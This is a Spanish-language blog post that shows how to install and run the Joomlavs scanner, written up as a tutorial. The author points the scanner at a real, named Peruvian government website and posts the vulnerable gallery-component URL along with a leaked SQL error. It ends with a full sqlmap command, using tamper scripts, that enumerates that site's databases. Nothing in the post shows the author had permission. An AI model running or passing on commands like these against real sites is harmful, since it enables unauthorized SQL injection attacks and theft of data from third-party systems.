miércoles, 7 de diciembre de 2016

Auditando servidores Joomla con Joomlavs

Saludos mis fieles lectores en esta oportunidad les enseñare auditar plataformas en Joomla, con este nuevo escaner de vulnerabilidades.

¿Que es Joomalavs? 

Es un escaner de vulnerabilidades elaborado en Ruby, con el objetivo de encontrar agujeros de seguridad en componentes, módulos y temas instalados en la plataforma web.

Instalación:

root@kali:~# git clone https://github.com/rastating/joomlavs.git
root@kali:~# cd joomlavs/
root@kali:~/joomlavs# sudo gem install bundler && bundle install

descargamos el repositorio en Github y proceder a instalar el bundler y los requerimientos gems, deben instalar las dependencias.

root@kali:~# sudo apt-get install build-essential patch
root@kali:~# sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev

Completado toda la instalación pueden ver el modo de uso. 

Opciones:


uso: joomlavs.rb [opciones]
Opciones básicas
    -u, --url La URL / dominio de Joomla que se va a escanear.
    --basic-auth <nombre de usuario: contraseña> Las credenciales básicas de autenticación HTTP
    -v, --verbose Activar modo detallado
Opciones de enumeración
    -a, --scan-all Analiza todas las extensiones vulnerables
    -c, --scan-components Búsqueda de componentes vulnerables
    -m, --scan-modules Búsqueda de módulos vulnerables
    -t, --scan-templates Búsqueda de plantillas vulnerables
    -q, --quiet Escanear utilizando sólo métodos pasivos
Opciones avanzadas
    --follow-redirection Seguir automáticamente los redireccionamientos
    --no-color Deshabilitar colores en la salida
    --proxy <[protocolo: //] host: puerto> HTTP, SOCKS4 SOCKS4A y SOCKS5 son compatibles. Si no se proporciona ningún protocolo, HTTP se utilizará
    --proxy-auth <nombre de usuario: contraseña> Las credenciales de autenticación de proxy
    --threads El número de subprocesos a utilizar cuando se solicitan multi-subprocesos
    --user-agent La cadena del agente de usuario para enviar con todas las peticiones

Ejecución:

root@kali:~/joomlavs# ruby joomlavs.rb -u http://www.agroarequipa.gob.pe -a 

Estamos realizando un análisis completo de todos modulos, plugins y temas vulnerables que se encuentren en dicho servidor...

En consecuente nos arrojan varias vulnerabilidades de tipo SQL Injection, con las referencias de los PoC en Exploit-DB:


GET PAYLOAD:

GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1

Error-Based blind / inyección a ciegas.

Vista de error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY t1.`order` asc' at line 1 SQL=SELECT t1.*,t2.rate FROM #__bwg_image as t1 LEFT JOIN (SELECT rate, image_id FROM #__bwg_image_rate WHERE ip="204.52.135.190") as t2 ON t1.id=t2.image_id WHERE t1.published=1 AND t1.gallery_id= ORDER BY t1.`order` asc

Otros parámetros:



Todos los parametros simple_prod.

Testando con SQLMAP:

sqlmap -u "http://www.agroarequipa.gob.pe/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1" -p theme_id --random-agent --dbms=MySQL --tamper="charencode,between" --dbs

Saludos!

0 comentarios:

Publicar un comentario

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares